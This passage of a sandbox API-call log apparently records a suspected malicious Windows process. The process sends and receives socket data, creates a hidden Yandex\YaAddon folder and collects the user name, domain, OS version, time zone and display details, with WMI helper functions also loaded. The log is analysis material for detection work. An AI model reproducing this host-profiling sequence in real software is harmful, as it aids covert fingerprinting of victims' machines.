flags=0) returned 217 [0164.923] recv (in: s=0x264, buf=0x241e714, len=8192, flags=0 | out: buf=0x241e714*) returned 142 [0170.368] CoCreateGuid (in: pguid=0x36f044 | out: pguid=0x36f044*(Data1=0x4fdd5d56, Data2=0xa7e2, Data3=0x48bc, Data4=([0]=0x94, [1]=0x12, [2]=0x7d, [3]=0xe6, [4]=0x71, [5]=0xd2, [6]=0x49, [7]=0xbf))) returned 0x0 [0170.425] CoCreateGuid (in: pguid=0x36ef88 | out: pguid=0x36ef88*(Data1=0x25d8d32a, Data2=0xc7f5, Data3=0x476f, Data4=([0]=0x89, [1]=0x3b, [2]=0x94, [3]=0xc3, [4]=0x49, [5]=0x80, [6]=0xb, [7]=0x6e))) returned 0x0 [0170.427] send (s=0x264, buf=0x241d173*, len=154, flags=0) returned 154 [0170.429] recv (in: s=0x264, buf=0x241e714, len=8192, flags=0 | out: buf=0x241e714*) returned 4548 [0170.482] GetCurrentProcess () returned 0xffffffff [0170.482] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36e870 | out: TokenHandle=0x36e870*=0x268) returned 1 [0170.484] CloseHandle (hObject=0x268) returned 1 [0170.484] GetCurrentProcess () returned 0xffffffff [0170.485] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36e888 | out: TokenHandle=0x36e888*=0x268) returned 1 [0170.485] CloseHandle (hObject=0x268) returned 1 [0172.167] CoTaskMemAlloc (cb=0x20c) returned 0x74dfe8 [0172.168] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x74dfe8 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0172.220] CoTaskMemFree (pv=0x74dfe8) [0172.220] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x36ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local", lpFilePart=0x0) returned 0x20 [0172.220] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", nBufferLength=0x105, lpBuffer=0x36edf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", lpFilePart=0x0) returned 0x2f [0172.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f034) returned 1 [0172.220] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\yandex\\yaaddon"), fInfoLevelId=0x0, lpFileInformation=0x36f2f8 | out: lpFileInformation=0x36f2f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0172.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f030) returned 1 [0172.221] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", nBufferLength=0x105, lpBuffer=0x36edfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", lpFilePart=0x0) returned 0x2f [0172.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36efc4) returned 1 [0172.221] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\yandex\\yaaddon"), fInfoLevelId=0x0, lpFileInformation=0x36f288 | out: lpFileInformation=0x36f288*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0172.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36efc0) returned 1 [0172.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36efc4) returned 1 [0172.221] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\yandex\\yaaddon"), fInfoLevelId=0x0, lpFileInformation=0x36f288 | out: lpFileInformation=0x36f288*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0172.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36efc0) returned 1 [0172.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36efc4) returned 1 [0172.221] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\yandex"), fInfoLevelId=0x0, lpFileInformation=0x36f288 | out: lpFileInformation=0x36f288*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0172.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36efc0) returned 1 [0172.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36efc4) returned 1 [0172.222] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0x36f288 | out: lpFileInformation=0x36f288*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0172.222] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36efc0) returned 1 [0172.223] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\yandex"), lpSecurityAttributes=0x0) returned 1 [0172.226] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\yandex\\yaaddon"), lpSecurityAttributes=0x0) returned 1 [0172.471] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x36f070 | out: pTimeZoneInformation=0x36f070) returned 0x1 [0172.560] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f154 | out: phkResult=0x36f154*=0x268) returned 0x0 [0172.625] RegQueryValueExW (in: hKey=0x268, lpValueName="TZI", lpReserved=0x0, lpType=0x36f170, lpData=0x0, lpcbData=0x36f16c*=0x0 | out: lpType=0x36f170*=0x3, lpData=0x0, lpcbData=0x36f16c*=0x2c) returned 0x0 [0172.625] RegQueryValueExW (in: hKey=0x268, lpValueName="TZI", lpReserved=0x0, lpType=0x36f170, lpData=0x2458d88, lpcbData=0x36f16c*=0x2c | out: lpType=0x36f170*=0x3, lpData=0x2458d88*, lpcbData=0x36f16c*=0x2c) returned 0x0 [0172.626] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x36efa8 | out: phkResult=0x36efa8*=0x0) returned 0x2 [0172.680] RegQueryValueExW (in: hKey=0x268, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x36f148, lpData=0x0, lpcbData=0x36f144*=0x0 | out: lpType=0x36f148*=0x1, lpData=0x0, lpcbData=0x36f144*=0x20) returned 0x0 [0172.681] RegQueryValueExW (in: hKey=0x268, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x36f148, lpData=0x24591ac, lpcbData=0x36f144*=0x20 | out: lpType=0x36f148*=0x1, lpData="@tzres.dll,-320", lpcbData=0x36f144*=0x20) returned 0x0 [0172.681] RegQueryValueExW (in: hKey=0x268, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x36f148, lpData=0x0, lpcbData=0x36f144*=0x0 | out: lpType=0x36f148*=0x1, lpData=0x0, lpcbData=0x36f144*=0x20) returned 0x0 [0172.681] RegQueryValueExW (in: hKey=0x268, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x36f148, lpData=0x2459204, lpcbData=0x36f144*=0x20 | out: lpType=0x36f148*=0x1, lpData="@tzres.dll,-322", lpcbData=0x36f144*=0x20) returned 0x0 [0172.681] RegQueryValueExW (in: hKey=0x268, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x36f148, lpData=0x0, lpcbData=0x36f144*=0x0 | out: lpType=0x36f148*=0x1, lpData=0x0, lpcbData=0x36f144*=0x20) returned 0x0 [0172.681] RegQueryValueExW (in: hKey=0x268, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x36f148, lpData=0x245925c, lpcbData=0x36f144*=0x20 | out: lpType=0x36f148*=0x1, lpData="@tzres.dll,-321", lpcbData=0x36f144*=0x20) returned 0x0 [0172.683] CoTaskMemAlloc (cb=0x20c) returned 0x74e1b0 [0172.683] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x74e1b0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0172.685] CoTaskMemFree (pv=0x74e1b0) [0172.685] CoTaskMemAlloc (cb=0x20c) returned 0x74e1b0 [0172.685] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x36f164, pwszFileMUIPath=0x74e1b0, pcchFileMUIPath=0x36f168, pululEnumerator=0x36f15c | out: pwszLanguage=0x0, pcchLanguage=0x36f164, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x36f168, pululEnumerator=0x36f15c) returned 1 [0172.690] CoTaskMemFree (pv=0x0) [0172.690] CoTaskMemFree (pv=0x74e1b0) [0172.691] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x3c0001 [0172.695] CoTaskMemAlloc (cb=0x3ec) returned 0x74e1b0 [0172.695] LoadStringW (in: hInstance=0x3c0001, uID=0x140, lpBuffer=0x74e1b0, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0172.695] CoTaskMemFree (pv=0x74e1b0) [0172.696] FreeLibrary (hLibModule=0x3c0001) returned 1 [0172.696] CoTaskMemAlloc (cb=0x20c) returned 0x74e1b0 [0172.696] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x74e1b0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0172.697] CoTaskMemFree (pv=0x74e1b0) [0172.697] CoTaskMemAlloc (cb=0x20c) returned 0x74e1b0 [0172.697] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x36f164, pwszFileMUIPath=0x74e1b0, pcchFileMUIPath=0x36f168, pululEnumerator=0x36f15c | out: pwszLanguage=0x0, pcchLanguage=0x36f164, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x36f168, pululEnumerator=0x36f15c) returned 1 [0172.700] CoTaskMemFree (pv=0x0) [0172.700] CoTaskMemFree (pv=0x74e1b0) [0172.700] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x3c0001 [0172.703] CoTaskMemAlloc (cb=0x3ec) returned 0x74e1b0 [0172.703] LoadStringW (in: hInstance=0x3c0001, uID=0x142, lpBuffer=0x74e1b0, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0172.703] CoTaskMemFree (pv=0x74e1b0) [0172.703] FreeLibrary (hLibModule=0x3c0001) returned 1 [0172.704] CoTaskMemAlloc (cb=0x20c) returned 0x74e1b0 [0172.704] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x74e1b0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0172.704] CoTaskMemFree (pv=0x74e1b0) [0172.704] CoTaskMemAlloc (cb=0x20c) returned 0x74e1b0 [0172.704] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x36f164, pwszFileMUIPath=0x74e1b0, pcchFileMUIPath=0x36f168, pululEnumerator=0x36f15c | out: pwszLanguage=0x0, pcchLanguage=0x36f164, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x36f168, pululEnumerator=0x36f15c) returned 1 [0172.706] CoTaskMemFree (pv=0x0) [0172.706] CoTaskMemFree (pv=0x74e1b0) [0172.707] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x3c0001 [0172.709] CoTaskMemAlloc (cb=0x3ec) returned 0x74e1b0 [0172.709] LoadStringW (in: hInstance=0x3c0001, uID=0x141, lpBuffer=0x74e1b0, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0172.709] CoTaskMemFree (pv=0x74e1b0) [0172.709] FreeLibrary (hLibModule=0x3c0001) returned 1 [0172.710] RegCloseKey (hKey=0x268) returned 0x0 [0175.874] GdiplusStartup (in: token=0x37a280, input=0x36e7f8, output=0x36e848 | out: token=0x37a280, output=0x36e848) returned 0x0 [0176.033] GdipCreateFromHWND (hwnd=0x0, graphics=0x36f2e4) returned 0x0 [0176.038] GdipGetDC (graphics=0x9d2230, hdc=0x36f2f4) returned 0x0 [0176.122] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gdi32", cchWideChar=5, lpMultiByteStr=0x36f294, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gdi32E\x1f", lpUsedDefaultChar=0x0) returned 5 [0176.122] LoadLibraryA (lpLibFileName="gdi32") returned 0x77240000 [0176.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetDeviceCaps", cchWideChar=13, lpMultiByteStr=0x36f28c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDeviceCapsF\x1f", lpUsedDefaultChar=0x0) returned 13 [0176.147] GetProcAddress (hModule=0x77240000, lpProcName="GetDeviceCaps") returned 0x77254de0 [0176.196] GetDeviceCaps (hdc=0x1401027a, index=10) returned 900 [0176.196] GetDeviceCaps (hdc=0x1401027a, index=117) returned 900 [0176.199] GdipReleaseDC (graphics=0x9d2230, hdc=0x1401027a) returned 0x0 [0176.200] GdipDeleteGraphics (graphics=0x9d2230) returned 0x0 [0176.204] GetSystemMetrics (nIndex=80) returned 1 [0176.228] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x48e0ae6, dwData=0x0) returned 1 [0176.235] GetMonitorInfoW (in: hMonitor=0x10001, lpmi=0x36f0b4 | out: lpmi=0x36f0b4) returned 1 [0176.238] CreateDCW (pwszDriver="\\\\.\\DISPLAY1", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0x29010b0f [0176.243] GetDeviceCaps (hdc=0x29010b0f, index=12) returned 32 [0176.243] GetDeviceCaps (hdc=0x29010b0f, index=14) returned 1 [0176.244] DeleteDC (hdc=0x29010b0f) returned 1 [0176.252] GetProcessWindowStation () returned 0x60 [0176.253] GetUserObjectInformationA (in: hObj=0x60, nIndex=1, pvInfo=0x2472bb8, nLength=0xc, lpnLengthNeeded=0x36f284 | out: pvInfo=0x2472bb8, lpnLengthNeeded=0x36f284) returned 1 [0176.256] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x290 [0180.467] CoCreateGuid (in: pguid=0x36e3b4 | out: pguid=0x36e3b4*(Data1=0x50de7c3e, Data2=0xa9ca, Data3=0x4896, Data4=([0]=0x9e, [1]=0x25, [2]=0x84, [3]=0xec, [4]=0x8f, [5]=0x62, [6]=0x27, [7]=0xaf))) returned 0x0 [0181.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x36edbc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0181.035] GetUserNameW (in: lpBuffer=0x36f108, pcbBuffer=0x36f380 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x36f380) returned 1 [0181.131] GetCurrentProcess () returned 0xffffffff [0181.131] GetCurrentThread () returned 0xfffffffe [0181.131] GetCurrentProcess () returned 0xffffffff [0181.131] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x36f33c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x36f33c*=0x2c0) returned 1 [0181.131] GetCurrentThreadId () returned 0xec8 [0181.169] OleInitialize (pvReserved=0x0) returned 0x80010106 [0181.173] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0181.188] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000 [0181.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="IsWow64Process", cchWideChar=14, lpMultiByteStr=0x36f2e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsWow64ProcessÝptÃ\x03ÌDþÓq\\ö6", lpUsedDefaultChar=0x0) returned 14 [0181.188] GetProcAddress (hModule=0x769b0000, lpProcName="IsWow64Process") returned 0x769c193e [0181.188] GetCurrentProcess () returned 0xffffffff [0181.189] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x36f348 | out: Wow64Process=0x36f348*=1) returned 1 [0181.198] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2e4 | out: phkResult=0x36f2e4*=0x2c4) returned 0x0 [0181.199] RegQueryValueExW (in: hKey=0x2c4, lpValueName="ProductName", lpReserved=0x0, lpType=0x36f304, lpData=0x0, lpcbData=0x36f300*=0x0 | out: lpType=0x36f304*=0x1, lpData=0x0, lpcbData=0x36f300*=0x2e) returned 0x0 [0181.200] RegQueryValueExW (in: hKey=0x2c4, lpValueName="ProductName", lpReserved=0x0, lpType=0x36f304, lpData=0x24ecddc, lpcbData=0x36f300*=0x2e | out: lpType=0x36f304*=0x1, lpData="Windows 7 Professional", lpcbData=0x36f300*=0x2e) returned 0x0 [0181.200] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2e4 | out: phkResult=0x36f2e4*=0x2c8) returned 0x0 [0181.200] RegQueryValueExW (in: hKey=0x2c8, lpValueName="CSDVersion", lpReserved=0x0, lpType=0x36f304, lpData=0x0, lpcbData=0x36f300*=0x0 | out: lpType=0x36f304*=0x0, lpData=0x0, lpcbData=0x36f300*=0x0) returned 0x2 [0181.508] CoTaskMemAlloc (cb=0x804) returned 0x767088 [0181.508] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x767088, nSize=0x36f370 | out: lpNameBuffer="Q9IATRKPRH\\kEecfMwgj", nSize=0x36f370) returned 0x1 [0181.509] CoTaskMemFree (pv=0x767088) [0181.509] GetUserNameW (in: lpBuffer=0x36f100, pcbBuffer=0x36f378 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x36f378) returned 1 [0181.921] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2cc [0181.958] CoGetObjectContext (in: riid=0x24eeee8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ebc0 | out: ppv=0x36ebc0*=0x6ee4bc) returned 0x0 [0182.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x36de10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0182.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", cchWideChar=63, lpMultiByteStr=0x36e338, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll", lpUsedDefaultChar=0x0) returned 63 [0182.478] LoadLibraryA (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\\\wminet_utils.dll") returned 0x727c0000 [0182.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x36e36c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecuritymNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 13 [0182.817] GetProcAddress (hModule=0x727c0000, lpProcName="ResetSecurity") returned 0x727c7dd0 [0182.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x36e36c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity", lpUsedDefaultChar=0x0) returned 11 [0182.828] GetProcAddress (hModule=0x727c0000, lpProcName="SetSecurity") returned 0x727c7e20 [0182.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x36e368, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 18 [0182.840] GetProcAddress (hModule=0x727c0000, lpProcName="BlessIWbemServices") returned 0x727c6e70 [0182.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x36e360, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObject»mNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 24 [0182.970] GetProcAddress (hModule=0x727c0000, lpProcName="BlessIWbemServicesObject") returned 0x727c6ed0 [0183.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x36e368, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandlemNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 17 [0183.054] GetProcAddress (hModule=0x727c0000, lpProcName="GetPropertyHandle") returned 0x727c7820 [0183.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x36e368, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValueNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 18 [0183.073] GetProcAddress (hModule=0x727c0000, lpProcName="WritePropertyValue") returned 0x727c7fa0 [0183.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x36e374, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ClonemNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 5 [0183.092] GetProcAddress (hModule=0x727c0000, lpProcName="Clone") returned 0x727c6f30 [0183.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x36e368, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey", lpUsedDefaultChar=0x0) returned 15 [0183.106] GetProcAddress (hModule=0x727c0000, lpProcName="VerifyClientKey") returned 0x727c7f20 [0183.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetQualifierSet", cchWideChar=15, lpMultiByteStr=0x36e368, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetQualifierSet", lpUsedDefaultChar=0x0) returned 15 [0183.114] GetProcAddress (hModule=0x727c0000, lpProcName="GetQualifierSet") returned 0x727c78e0 [0183.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Get", cchWideChar=3, lpMultiByteStr=0x36e374, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Get", lpUsedDefaultChar=0x0) returned 3 [0183.117] GetProcAddress (hModule=0x727c0000, lpProcName="Get") returned 0x727c75c0 [0183.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Put", cchWideChar=3, lpMultiByteStr=0x36e374, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Put", lpUsedDefaultChar=0x0) returned 3 [0183.246] GetProcAddress (hModule=0x727c0000, lpProcName="Put") returned 0x727c7a00 [0183.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Delete", cchWideChar=6, lpMultiByteStr=0x36e374, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeleteNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 6 [0183.331] GetProcAddress (hModule=0x727c0000, lpProcName="Delete") returned 0x727c7300 [0183.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetNames", cchWideChar=8, lpMultiByteStr=0x36e370, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNames»mNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 8 [0183.347] GetProcAddress (hModule=0x727c0000, lpProcName="GetNames") returned 0x727c77c0 [0183.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginEnumeration", cchWideChar=16, lpMultiByteStr=0x36e368, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginEnumeration»mNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 16 [0183.402] GetProcAddress (hModule=0x727c0000, lpProcName="BeginEnumeration") returned 0x727c6e30 [0183.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Next", cchWideChar=4, lpMultiByteStr=0x36e374, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Next»mNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 4 [0183.491] GetProcAddress (hModule=0x727c0000, lpProcName="Next") returned 0x727c79a0 [0183.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndEnumeration", cchWideChar=14, lpMultiByteStr=0x36e36c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndEnumerationNltÃ\x03ÌDþÓqHæ6", lpUsedDefaultChar=0x0) returned 14 [0183.562] GetProcAddress 